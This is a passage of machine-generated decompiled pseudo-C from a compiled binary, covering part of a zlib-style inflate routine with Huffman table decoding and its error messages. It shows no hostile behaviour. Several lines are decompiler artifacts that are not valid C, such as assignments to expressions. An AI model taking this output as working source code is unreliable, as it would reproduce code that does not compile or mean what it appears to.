                                                                                        													__eflags = __esi - 3;
                                                                                        													if(__esi < 3) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														goto L187;
                                                                                        													}
                                                                                        													goto L360;
                                                                                        												}
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											goto L360;
                                                                                        											L187:
                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                        											__ecx = __edx;
                                                                                        											__edi =  *(__ebp - 0xc);
                                                                                        											__ecx = __edx & 0x00000007;
                                                                                        											__edx = __edx >> 3;
                                                                                        											__esi = __esi - 3;
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											__eax =  *( *(__ebp - 0xc) + 0x6c);
                                                                                        											 *(__ebp - 0x18) = __esi;
                                                                                        											__eax =  *(0x194078 +  *( *(__ebp - 0xc) + 0x6c) * 2) & 0x0000ffff;
                                                                                        											 *((short*)(__edi + 0x74 + ( *(0x194078 +  *( *(__ebp - 0xc) + 0x6c) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                        											__ecx = __edi;
                                                                                        											__edi =  *(__ebp - 0x14);
                                                                                        											 *(__ecx + 0x6c) =  *(__ecx + 0x6c) + 1;
                                                                                        											__eax =  *(__ecx + 0x6c);
                                                                                        											__eflags = __eax -  *((intOrPtr*)(__ecx + 0x60));
                                                                                        										} while (__eax <  *((intOrPtr*)(__ecx + 0x60)));
                                                                                        										goto L188;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x12:
                                                                                        									L194:
                                                                                        									 *((intOrPtr*)(__ecx + 0x68)) =  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64);
                                                                                        									__eflags =  *(__ecx + 0x6c) -  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64);
                                                                                        									if( *(__ecx + 0x6c) >=  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64)) {
                                                                                        										L229:
                                                                                        										__eax =  *(__ebp - 0x2c);
                                                                                        										goto L230;
                                                                                        									} else {
                                                                                        										do {
                                                                                        											L195:
                                                                                        											__ecx =  *(__ecx + 0x58);
                                                                                        											__eax = 1;
                                                                                        											_t481 = (1 << __cl) - 1; // 0x0
                                                                                        											__ecx = _t481;
                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                        											 *(__ebp - 0x3c) = __ecx;
                                                                                        											__ecx = __ecx & __edx;
                                                                                        											__edi =  *( *(__ebp - 0xc) + 0x50);
                                                                                        											 *(__ebp - 0x34) = __edi;
                                                                                        											__eax =  *(__edi + __ecx * 4);
                                                                                        											__eax = __eax >> 8;
                                                                                        											__eax = __eax >> 0x10;
                                                                                        											 *(__ebp - 0x2c) = __eax >> 8;
                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                        											 *(__ebp - 0x18) = __eax >> 0x10;
                                                                                        											__edi =  *(__ebp - 0x14);
                                                                                        											__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        											if((__cl & 0x000000ff) <= __esi) {
                                                                                        												L199:
                                                                                        												__ebx =  *(__ebp - 0x18);
                                                                                        												__ecx =  *(__ebp - 0x2c);
                                                                                        												__ebx = __bx & 0x0000ffff;
                                                                                        												 *(__ebp - 0x40) = __ebx;
                                                                                        												__eflags = __ebx - 0x10;
                                                                                        												__ebx =  *(__ebp - 0x10);
                                                                                        												 *(__ebp - 0x3c) = __ecx;
                                                                                        												 *(__ebp - 0x2c) = __ecx;
                                                                                        												 *(__ebp - 0x34) = __ecx;
                                                                                        												if(__eflags >= 0) {
                                                                                        													L201:
                                                                                        													__eflags =  *(__ebp - 0x18) - 0x10;
                                                                                        													if( *(__ebp - 0x18) != 0x10) {
                                                                                        														L208:
                                                                                        														__eflags =  *(__ebp - 0x40) - 0x11;
                                                                                        														__ecx =  *(__ebp - 0x3c);
                                                                                        														__ecx = __cl & 0x000000ff;
                                                                                        														 *(__ebp - 0x3c) = __ecx;
                                                                                        														if( *(__ebp - 0x40) != 0x11) {
                                                                                        															L215:
                                                                                        															__ecx = __ecx + 7;
                                                                                        															__eflags = __esi - __ecx;
                                                                                        															if(__esi >= __ecx) {
                                                                                        																L220:
                                                                                        																__ecx = __ah & 0x000000ff;
                                                                                        																__edx = __edx >> __cl;
                                                                                        																__edx = __edx & 0x0000007f;
                                                                                        																__eax = (__edx & 0x0000007f) + 0xb;
                                                                                        																__edx = __edx >> 7;
                                                                                        																__eflags = __edx;
                                                                                        																 *(__ebp - 0x2c) = __eax;
                                                                                        																__eax = 0xfffffff9;
                                                                                        																goto L221;
                                                                                        															} else {
                                                                                        																L216:
                                                                                        																while(1) {
                                                                                        																	L217:
                                                                                        																	__eflags = __ebx;
                                                                                        																	if(__ebx == 0) {
                                                                                        																		goto L101;
                                                                                        																	}
                                                                                        																	L218:
                                                                                        																	__edx =  *__edi & 0x000000ff;
                                                                                        																	__ecx = __esi;
                                                                                        																	__edx = ( *__edi & 0x000000ff) << __cl;
                                                                                        																	__ebx = __ebx - 1;
                                                                                        																	__ecx =  *(__ebp - 0x3c);
                                                                                        																	__edi = __edi + 1;
                                                                                        																	 *(__ebp - 8) =  *(__ebp - 8) + __edx;
                                                                                        																	__esi = __esi + 8;
                                                                                        																	__ecx =  *(__ebp - 0x3c) + 7;
                                                                                        																	 *(__ebp - 0x10) = __ebx;
                                                                                        																	 *(__ebp - 0x14) = __edi;
                                                                                        																	__eflags = __esi -  *(__ebp - 0x3c) + 7;
                                                                                        																	if(__esi <  *(__ebp - 0x3c) + 7) {
                                                                                        																		continue;
                                                                                        																	} else {
                                                                                        																		L219:
                                                                                        																		__edx =  *(__ebp - 8);
                                                                                        																		goto L220;
                                                                                        																	}
                                                                                        																	goto L360;
                                                                                        																}
                                                                                        																goto L101;
                                                                                        															}
                                                                                        														} else {
                                                                                        															L209:
                                                                                        															__ecx = __ecx + 3;
                                                                                        															__eflags = __esi - __ecx;
                                                                                        															if(__esi >= __ecx) {
                                                                                        																L214:
                                                                                        																__ecx = __ah & 0x000000ff;
                                                                                        																__edx = __edx >> __cl;
                                                                                        																__edx = __edx & 0x00000007;
                                                                                        																__eax = (__edx & 0x00000007) + 3;
                                                                                        																__edx = __edx >> 3;
                                                                                        																 *(__ebp - 0x2c) = __eax;
                                                                                        																__eax = 0xfffffffd;
                                                                                        																L221:
                                                                                        																__eax = __eax - __ecx;
                                                                                        																 *(__ebp - 0x34) = 0;
                                                                                        																__ecx =  *(__ebp - 0xc);
                                                                                        																__esi = __eax + __esi;
                                                                                        																__eflags = __esi;
                                                                                        																__eax =  *(__ebp - 0x2c);
                                                                                        																goto L222;
                                                                                        															} else {
                                                                                        																L210:
                                                                                        																while(1) {
                                                                                        																	L211:
                                                                                        																	__eflags = __ebx;
                                                                                        																	if(__ebx == 0) {
                                                                                        																		goto L101;
                                                                                        																	}
                                                                                        																	L212:
                                                                                        																	__edx =  *__edi & 0x000000ff;
                                                                                        																	__ecx = __esi;
                                                                                        																	__edx = ( *__edi & 0x000000ff) << __cl;
                                                                                        																	__ebx = __ebx - 1;
                                                                                        																	__ecx =  *(__ebp - 0x3c);
                                                                                        																	__edi = __edi + 1;
                                                                                        																	 *(__ebp - 8) =  *(__ebp - 8) + __edx;
                                                                                        																	__esi = __esi + 8;
                                                                                        																	__ecx =  *(__ebp - 0x3c) + 3;
                                                                                        																	 *(__ebp - 0x10) = __ebx;
                                                                                        																	 *(__ebp - 0x14) = __edi;
                                                                                        																	__eflags = __esi -  *(__ebp - 0x3c) + 3;
                                                                                        																	if(__esi <  *(__ebp - 0x3c) + 3) {
                                                                                        																		continue;
                                                                                        																	} else {
                                                                                        																		L213:
                                                                                        																		__edx =  *(__ebp - 8);
                                                                                        																		goto L214;
                                                                                        																	}
                                                                                        																	goto L360;
                                                                                        																}
                                                                                        																goto L101;
                                                                                        															}
                                                                                        														}
                                                                                        													} else {
                                                                                        														L202:
                                                                                        														 *(__ebp - 0x2c) = __cl & 0x000000ff;
                                                                                        														__ecx = 2 + (__cl & 0x000000ff);
                                                                                        														 *(__ebp - 0x3c) = __ecx;
                                                                                        														__eflags = __esi - __ecx;
                                                                                        														if(__esi >= __ecx) {
                                                                                        															L206:
                                                                                        															__ecx = __ah & 0x000000ff;
                                                                                        															__edx = __edx >> __cl;
                                                                                        															__esi = __esi - (__ah & 0x000000ff);
                                                                                        															__ecx =  *(__ebp - 0xc);
                                                                                        															 *(__ebp - 8) = __edx;
                                                                                        															 *(__ebp - 0x18) = __esi;
                                                                                        															__eflags =  *(__ecx + 0x6c);
                                                                                        															if( *(__ecx + 0x6c) == 0) {
                                                                                        																L228:
                                                                                        																__eax =  *(__ebp + 8);
                                                                                        																 *( *(__ebp + 8) + 0x18) = "invalid bit length repeat";
                                                                                        																 *(__ecx + 4) = 0x3f51;
                                                                                        																goto L263;
                                                                                        															} else {
                                                                                        																L207:
                                                                                        																__edi =  *(__ecx + 0x6c);
                                                                                        																__eax = __edx;
                                                                                        																__eax = __edx & 0x00000003;
                                                                                        																__edx = __edx >> 2;
                                                                                        																__eax = __eax + 3;
                                                                                        																__esi = __esi - 2;
                                                                                        																 *(__ebp - 0x2c) = __eax;
                                                                                        																__edi =  *(__ecx + 0x72 +  *(__ecx + 0x6c) * 2) & 0x0000ffff;
                                                                                        																 *(__ebp - 0x34) =  *(__ecx + 0x72 +  *(__ecx + 0x6c) * 2) & 0x0000ffff;
                                                                                        																L222:
                                                                                        																__ecx =  *(__ecx + 0x6c);
                                                                                        																__edi =  *(__ebp - 0xc);
                                                                                        																__ecx = __eax + __ecx;
                                                                                        																__eax =  *(__ebp - 0xc);
                                                                                        																 *(__ebp - 8) = __edx;
                                                                                        																 *(__ebp - 0x18) = __esi;
                                                                                        																 *((intOrPtr*)( *(__ebp - 0xc) + 0x68)) =  *((intOrPtr*)( *(__ebp - 0xc) + 0x68)) +  *((intOrPtr*)( *(__ebp - 0xc) + 0x64));
                                                                                        																__edi =  *(__ebp - 0x14);
                                                                                        																__eflags = __ecx -  *((intOrPtr*)( *(__ebp - 0xc) + 0x68)) +  *((intOrPtr*)( *(__ebp - 0xc) + 0x64));
                                                                                        																__ecx =  *(__ebp - 0xc);
                                                                                        																if(__eflags > 0) {
                                                                                        																	goto L228;
                                                                                        																} else {
                                                                                        																	L223:
                                                                                        																	__ebx =  *(__ebp - 0x2c);
                                                                                        																	__edx =  *(__ebp - 0x34);
                                                                                        																	asm("o16 nop [eax+eax]");
                                                                                        																	do {
                                                                                        																		L224:
                                                                                        																		__eax =  *(__ecx + 0x6c);
                                                                                        																		 *((short*)(__ecx + 0x74 +  *(__ecx + 0x6c) * 2)) = __dx;
                                                                                        																		__edi =  *(__ecx + 0x6c);
                                                                                        																		__edi =  *(__ecx + 0x6c) + 1;
                                                                                        																		 *(__ebp - 0x3c) = __edi;
                                                                                        																		 *(__ecx + 0x6c) = __edi;
                                                                                        																		__ebx = __ebx - 1;
                                                                                        																		__eflags = __ebx;
                                                                                        																	} while (__ebx != 0);
                                                                                        																	__ebx =  *(__ebp - 0x10);
                                                                                        																	__edx =  *(__ebp - 8);
                                                                                        																	goto L226;
                                                                                        																}
                                                                                        															}
                                                                                        														} else {
                                                                                        															while(1) {
                                                                                        																L203:
                                                                                        																__eflags = __ebx;
                                                                                        																if(__ebx == 0) {
                                                                                        																	goto L101;
                                                                                        																}
                                                                                        																L204:
                                                                                        																__edx =  *__edi & 0x000000ff;
                                                                                        																__ecx = __esi;
                                                                                        																__edx = ( *__edi & 0x000000ff) << __cl;
                                                                                        																__ebx = __ebx - 1;
                                                                                        																 *(__ebp - 8) =  *(__ebp - 8) + (( *__edi & 0x000000ff) << __cl);
                                                                                        																__edi = __edi + 1;
                                                                                        																__esi = __esi + 8;
                                                                                        																 *(__ebp - 0x10) = __ebx;
                                                                                        																 *(__ebp - 0x14) = __edi;
                                                                                        																__eflags = __esi -  *(__ebp - 0x3c);
                                                                                        																if(__esi <  *(__ebp - 0x3c)) {
                                                                                        																	continue;
                                                                                        																} else {
                                                                                        																	L205:
                                                                                        																	__edx =  *(__ebp - 8);
                                                                                        																	goto L206;
                                                                                        																}
                                                                                        																goto L360;
                                                                                        															}
                                                                                        															goto L101;
                                                                                        														}
                                                                                        													}
                                                                                        												} else {
                                                                                        													L200:
                                                                                        													__edi =  *(__ebp - 0xc);
                                                                                        													__edx = __edx >> __cl;
                                                                                        													__ecx = __cl & 0x000000ff;
                                                                                        													__esi = __esi - (__cl & 0x000000ff);
                                                                                        													__eax = __eax >> 0x10;
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													 *(__ebp - 8) = __edx;
                                                                                        													 *(__ebp - 0x18) = __esi;
                                                                                        													__ecx =  *( *(__ebp - 0xc) + 0x6c);
                                                                                        													 *((short*)(__edi + 0x74 +  *( *(__ebp - 0xc) + 0x6c) * 2)) = __ax;
                                                                                        													__ecx = __edi;
                                                                                        													 *(__ecx + 0x6c) =  *(__ecx + 0x6c) + 1;
                                                                                        													__eax =  *(__ecx + 0x6c);
                                                                                        													 *(__ebp - 0x3c) =  *(__ecx + 0x6c);
                                                                                        													goto L226;
                                                                                        												}
                                                                                        											} else {
                                                                                        												L196:
                                                                                        												while(1) {
                                                                                        													L197:
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L101;
                                                                                        													}
                                                                                        													L198:
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													__ecx =  *(__ebp - 0x34);
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													__eax =  *(__ebp - 0x3c);
                                                                                        													__edi = __edi + 1;
                                                                                        													__eax =  *(__ebp - 0x3c) & __edx;
                                                                                        													 *(__ebp - 0x10) = __ebx;
                                                                                        													__esi = __esi + 8;
                                                                                        													 *(__ebp - 8) = __edx;
                                                                                        													 *(__ebp - 0x14) = __edi;
                                                                                        													__eax =  *( *(__ebp - 0x34) + ( *(__ebp - 0x3c) & __edx) * 4);
                                                                                        													__eax = __eax >> 8;
                                                                                        													__eax = __eax >> 0x10;
                                                                                        													 *(__ebp - 0x2c) = __eax >> 8;
                                                                                        													__ecx = __cl & 0x000000ff;
                                                                                        													 *(__ebp - 0x18) = __eax >> 0x10;
                                                                                        													__ebx =  *(__ebp - 0x10);
                                                                                        													__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        													if((__cl & 0x000000ff) > __esi) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														goto L199;
                                                                                        													}
                                                                                        													goto L360;
                                                                                        												}
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											goto L360;
                                                                                        											L226:
                                                                                        											 *((intOrPtr*)(__ecx + 0x68)) =  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64);
                                                                                        											__edi =  *(__ebp - 0x14);
                                                                                        											__eflags =  *(__ebp - 0x3c) -  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64);
                                                                                        										} while ( *(__ebp - 0x3c) <  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64));
                                                                                        										__eax =  *(__ecx + 4);
                                                                                        										L230:
                                                                                        										__eflags = __eax - 0x3f51;
                                                                                        										if(__eax == 0x3f51) {
                                                                                        											goto L263;
                                                                                        										} else {
                                                                                        											L231:
                                                                                        											__eflags =  *((short*)(__ecx + 0x274));
                                                                                        											if( *((short*)(__ecx + 0x274)) != 0) {
                                                                                        												L233:
                                                                                        												__eax = __ecx + 0x534;
                                                                                        												 *(__ecx + 0x58) = 9;
                                                                                        												__edx = __ecx + 0x70;
                                                                                        												 *(__ecx + 0x50) = __eax;
                                                                                        												__edi = __ecx + 0x2f4;
                                                                                        												 *__edx = __eax;
                                                                                        												__eax = __ecx + 0x58;
                                                                                        												 *(__ebp - 0x40) = __edx;
                                                                                        												__eax = __ecx + 0x74;
                                                                                        												 *(__ebp - 0x3c) = __ecx + 0x2f4;
                                                                                        												__eax = E0018BE70(1, __ecx + 0x74,  *(__ecx + 0x64), __edx, __ecx + 0x58, __ecx + 0x2f4);
                                                                                        												__edi =  *(__ebp - 0x14);
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												 *(__ebp - 0x30) = __eax;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax == 0) {
                                                                                        													L235:
                                                                                        													__edx =  *(__ebp - 0x40);
                                                                                        													 *(__ecx + 0x5c) = 6;
                                                                                        													__eax =  *__edx;
                                                                                        													 *(__ecx + 0x54) =  *__edx;
                                                                                        													__eax = __ecx + 0x5c;
                                                                                        													__eax =  *(__ecx + 0x64);
                                                                                        													__eax = __ecx + __eax * 2;
                                                                                        													__eax = E0018BE70(2, __eax,  *((intOrPtr*)(__ecx + 0x68)), __edx, __ecx + 0x5c,  *(__ebp - 0x3c));
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													 *(__ebp - 0x30) = __eax;
                                                                                        													__eflags = __eax;
                                                                                        													if(__eax == 0) {
                                                                                        														L237:
                                                                                        														__edx =  *(__ebp + 0xc);
                                                                                        														 *(__ecx + 4) = 0x3f47;
                                                                                        														__eflags =  *(__ebp + 0xc) - 6;
                                                                                        														if( *(__ebp + 0xc) == 6) {
                                                                                        															L344:
                                                                                        															__eax =  *(__ebp - 0x10);
                                                                                        															goto L103;
                                                                                        														} else {
                                                                                        															L238:
                                                                                        															__edx =  *(__ebp - 8);
                                                                                        															goto L239;
                                                                                        														}
                                                                                        													} else {
                                                                                        														L236:
                                                                                        														__eax =  *(__ebp + 8);
                                                                                        														__edx =  *(__ebp - 8);
                                                                                        														 *( *(__ebp + 8) + 0x18) = "invalid distances set";
                                                                                        														 *(__ecx + 4) = 0x3f51;
                                                                                        														goto L263;
                                                                                        													}
                                                                                        												} else {
                                                                                        													L234:
                                                                                        													__eax =  *(__ebp + 8);
                                                                                        													__edx =  *(__ebp - 8);
                                                                                        													 *( *(__ebp + 8) + 0x18) = "invalid literal/lengths set";
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        													goto L263;
                                                                                        												}
                                                                                        											} else {
                                                                                        												L232:
                                                                                        												__eax =  *(__ebp + 8);
                                                                                        												 *( *(__ebp + 8) + 0x18) = "invalid code -- missing end-of-block";
                                                                                        												 *(__ecx + 4) = 0x3f51;
                                                                                        												goto L263;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x13:
                                                                                        									L239:
                                                                                        									 *(__ecx + 4) = 0x3f48;
                                                                                        									goto L240;
                                                                                        								case 0x14:
                                                                                        									L240:
                                                                                        									__eflags = __ebx - 6;
                                                                                        									if(__ebx < 6) {
                                                                                        										L244:
                                                                                        										 *(__ecx + 0x1bc8) = 0;
                                                                                        										__eax = 1;
                                                                                        										__ecx =  *(__ecx + 0x58);
                                                                                        										_t657 = (1 << __cl) - 1; // 0x0
                                                                                        										__ecx = _t657;
                                                                                        										__eax =  *(__ebp - 0xc);
                                                                                        										 *(__ebp - 0x40) = __ecx;
                                                                                        										__eax =  *( *(__ebp - 0xc) + 0x50);
                                                                                        										 *(__ebp - 0x2c) =  *( *(__ebp - 0xc) + 0x50);
                                                                                        										__eax = __ecx;
                                                                                        										__ecx =  *(__ebp - 0x2c);
                                                                                        										__eax = __eax & __edx;
                                                                                        										__eax =  *( *(__ebp - 0x2c) + __eax * 4);
                                                                                        										__eax = __eax >> 8;
                                                                                        										__ecx = __cl & 0x000000ff;
                                                                                        										__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        										if((__cl & 0x000000ff) <= __esi) {
                                                                                        											L248:
                                                                                        											__eflags = __al;
                                                                                        											if(__al == 0) {
                                                                                        												L254:
                                                                                        												__edi =  *(__ebp - 0xc);
                                                                                        												goto L255;
                                                                                        											} else {
                                                                                        												L249:
                                                                                        												__eflags = __al & 0x000000f0;
                                                                                        												if((__al & 0x000000f0) != 0) {
                                                                                        													goto L254;
                                                                                        												} else {
                                                                                        													L250:
                                                                                        													__ecx = __eax;
                                                                                        													__edi = 1;
                                                                                        													__ecx = __eax >> 8;
                                                                                        													__edx = __eax;
                                                                                        													__ebx = __cl & 0x000000ff;
                                                                                        													__al & 0x000000ff = __ebx + (__al & 0x000000ff);
                                                                                        													__eax = __eax >> 0x10;
                                                                                        													__edi = 1 << __cl;
                                                                                        													__ecx = __ebx;
                                                                                        													__edi = (1 << __cl) - 1;
                                                                                        													 *(__ebp - 0x34) = __edx;
                                                                                        													(0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8) = ((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl;
                                                                                        													__ecx =  *(__ebp - 0x2c);
                                                                                        													__edi = __eax + (((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl);
                                                                                        													__eax =  *( *(__ebp - 0x2c) + (__eax + (((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl)) * 4);
                                                                                        													__eax = __eax >> 8;
                                                                                        													__cl & 0x000000ff = __ebx + (__cl & 0x000000ff);
                                                                                        													__eflags = __ebx + (__cl & 0x000000ff) - __esi;
                                                                                        													if(__ebx + (__cl & 0x000000ff) <= __esi) {
                                                                                        														L253:
                                                                                        														__edi =  *(__ebp - 0xc);
                                                                                        														__ebx =  *(__ebp - 0x10);
                                                                                        														__ecx = __dh & 0x000000ff;
                                                                                        														__edx =  *(__ebp - 8);
                                                                                        														__edx =  *(__ebp - 8) >> __cl;
                                                                                        														__esi = __esi - __ecx;
                                                                                        														 *(__edi + 0x1bc8) = __ecx;
                                                                                        														L255:
                                                                                        														__eax = __eax >> 8;
                                                                                        														__ecx = __cl & 0x000000ff;
                                                                                        														 *(__edi + 0x1bc8) =  *(__edi + 0x1bc8) + __ecx;
                                                                                        														__esi = __esi - __ecx;
                                                                                        														__edx = __edx >> __cl;
                                                                                        														 *(__edi + 0x44) = __eax >> 0x10;
                                                                                        														__ecx =  *(__ebp - 0xc);
                                                                                        														 *(__ebp - 8) = __edx;
                                                                                        														 *(__ebp - 0x18) = __esi;
                                                                                        														__eflags = __al;
                                                                                        														if(__al != 0) {
                                                                                        															L257:
                                                                                        															__eflags = __al & 0x00000020;
                                                                                        															if((__al & 0x00000020) == 0) {
                                                                                        																L259:
                                                                                        																__eflags = __al & 0x00000040;
                                                                                        																if((__al & 0x00000040) == 0) {
                                                                                        																	L265:
                                                                                        																	__eax = __al & 0x000000ff;
                                                                                        																	__eax = __al & 0xf;
                                                                                        																	__eflags = __eax;
                                                                                        																	 *(__ecx + 4) = 0x3f49;
                                                                                        																	 *(__ecx + 0x4c) = __eax;
                                                                                        																	goto L266;
                                                                                        																} else {
                                                                                        																	L260:
                                                                                        																	__eax =  *(__ebp + 8);
                                                                                        																	 *( *(__ebp + 8) + 0x18) = "invalid literal/length code";
                                                                                        																	goto L261;
                                                                                        																}
                                                                                        															} else {
                                                                                        																L258:
                                                                                        																 *(__ecx + 0x1bc8) = 0xffffffff;
                                                                                        																 *(__ecx + 4) = 0x3f3f;
                                                                                        																goto L262;
                                                                                        															}
                                                                                        														} else {
                                                                                        															L256:
                                                                                        															 *(__ecx + 4) = 0x3f4d;
                                                                                        															goto L262;
                                                                                        														}
                                                                                        													} else {
                                                                                        														while(1) {
                                                                                        															L251:
                                                                                        															__eax =  *(__ebp - 0x10);
                                                                                        															__eflags = __eax;
                                                                                        															if(__eax == 0) {
                                                                                        																goto L102;
                                                                                        															}
                                                                                        															L252:
                                                                                        															__ebx =  *(__ebp - 0x14);
                                                                                        															 *(__ebp - 0x10) = __eax;
                                                                                        															__ecx = __esi;
                                                                                        															__edi = 1;
                                                                                        															__esi = __esi + 8;
                                                                                        															__eax =  *__ebx & 0x000000ff;
                                                                                        															__ebx = __ebx + 1;
                                                                                        															 *(__ebp - 8) = __eax +  *(__ebp - 8);
                                                                                        															__eax =  *(__ebp - 0x32) & 0x0000ffff;
                                                                                        															 *(__ebp - 0x14) = __ebx;
                                                                                        															__ebx = __dh & 0x000000ff;
                                                                                        															__dl & 0x000000ff = __ebx + (__dl & 0x000000ff);
                                                                                        															__edi = 1 << __cl;
                                                                                        															__ecx = __ebx;
                                                                                        															(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8);
                                                                                        															((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl = (((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff);
                                                                                        															__eax =  *(__ebp - 0x2c);
                                                                                        															__eax =  *( *(__ebp - 0x2c) + ((((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff)) * 4);
                                                                                        															__eax = __eax >> 8;
                                                                                        															__cl & 0x000000ff = __ebx + (__cl & 0x000000ff);
                                                                                        															__eflags = __ebx + (__cl & 0x000000ff) - __esi;
                                                                                        															if(__ebx + (__cl & 0x000000ff) > __esi) {
                                                                                        																continue;
                                                                                        															} else {
                                                                                        																goto L253;
                                                                                        															}
                                                                                        															goto L360;
                                                                                        														}
                                                                                        														goto L102;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										} else {
                                                                                        											L245:
                                                                                        											while(1) {
                                                                                        												L246:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L247:
                                                                                        												__eax =  *__edi & 0x000000ff;
                                                                                        												__ecx = __esi;
                                                                                        												__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        												__ebx = __ebx - 1;
                                                                                        												__ecx =  *(__ebp - 0x2c);
                                                                                        												__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        												__eax =  *(__ebp - 0x40);
                                                                                        												__edi = __edi + 1;
                                                                                        												__eax =  *(__ebp - 0x40) & __edx;
                                                                                        												 *(__ebp - 0x10) = __ebx;
                                                                                        												__esi = __esi + 8;
                                                                                        												 *(__ebp - 8) = __edx;
                                                                                        												 *(__ebp - 0x14) = __edi;
                                                                                        												__eax =  *( *(__ebp - 0x2c) + ( *(__ebp - 0x40) & __edx) * 4);
                                                                                        												__eax = __eax >> 8;
                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                        												__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        												if((__cl & 0x000000ff) > __esi) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													goto L248;
                                                                                        												}
                                                                                        												goto L360;
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        									} else {
                                                                                        										L241:
                                                                                        										__eflags =  *(__ebp - 0x1c) - 0x102;
                                                                                        										if( *(__ebp - 0x1c) < 0x102) {
                                                                                        											goto L244;
                                                                                        										} else {
                                                                                        											L242:
                                                                                        											__eax =  *(__ebp + 8);
                                                                                        											__edi =  *(__ebp - 0x24);
                                                                                        											 *(__eax + 0xc) =  *(__ebp - 0x24);
                                                                                        											__edi =  *(__ebp - 0x1c);
                                                                                        											 *(__eax + 0x10) =  *(__ebp - 0x1c);
                                                                                        											__edi =  *(__ebp - 0x14);
                                                                                        											 *__eax =  *(__ebp - 0x14);
                                                                                        											 *(__eax + 4) = __ebx;
                                                                                        											 *(__ecx + 0x3c) = __edx;
                                                                                        											 *(__ecx + 0x40) = __esi;
                                                                                        											__eax = E0018C270(__eax,  *(__ebp - 0x28));
                                                                                        											__eax =  *(__ebp + 8);
                                                                                        											__ecx =  *(__eax + 0xc);
                                                                                        											__edi =  *__eax;
                                                                                        											__ebx =  *(__eax + 4);
                                                                                        											 *(__ebp - 0x24) =  *(__eax + 0xc);
                                                                                        											__ecx =  *(__eax + 0x10);
                                                                                        											 *(__ebp - 0x1c) =  *(__eax + 0x10);
                                                                                        											__ecx =  *(__ebp - 0xc);
                                                                                        											 *(__ebp - 0x14) = __edi;
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											__eflags =  *(__ecx + 4) - 0x3f3f;
                                                                                        											__edx =  *(__ecx + 0x3c);
                                                                                        											__esi =  *(__ecx + 0x40);
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											 *(__ebp - 0x18) = __esi;
                                                                                        											if( *(__ecx + 4) == 0x3f3f) {
                                                                                        												 *(__ecx + 0x1bc8) = 0xffffffff;
                                                                                        											}
                                                                                        											goto L263;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x15:
                                                                                        									L266:
                                                                                        									__edi =  *(__ecx + 0x4c);
                                                                                        									__eflags = __edi;
                                                                                        									if(__edi == 0) {
                                                                                        										L273:
                                                                                        										__eax =  *(__ecx + 0x44);
                                                                                        										 *(__ecx + 0x1bcc) =  *(__ecx + 0x44);
                                                                                        										 *(__ecx + 4) = 0x3f4a;
                                                                                        										goto L274;
                                                                                        									} else {
                                                                                        										L267:
                                                                                        										__eflags = __esi - __edi;
                                                                                        										if(__esi >= __edi) {
                                                                                        											L272:
                                                                                        											__ecx = __edi;
                                                                                        											1 = 1 << __cl;
                                                                                        											__esi = __esi - __edi;
                                                                                        											__ecx =  *(__ebp - 0xc);
                                                                                        											(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
                                                                                        											 *( *(__ebp - 0xc) + 0x44) =  *( *(__ebp - 0xc) + 0x44) + ((0x00000001 << __cl) - 0x00000001 & __edx);
                                                                                        											__ecx = __edi;
                                                                                        											__edx = __edx >> __cl;
                                                                                        											__ecx =  *(__ebp - 0xc);
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											_t728 = __ecx + 0x1bc8;
                                                                                        											 *_t728 = __edi +  *(__ecx + 0x1bc8);
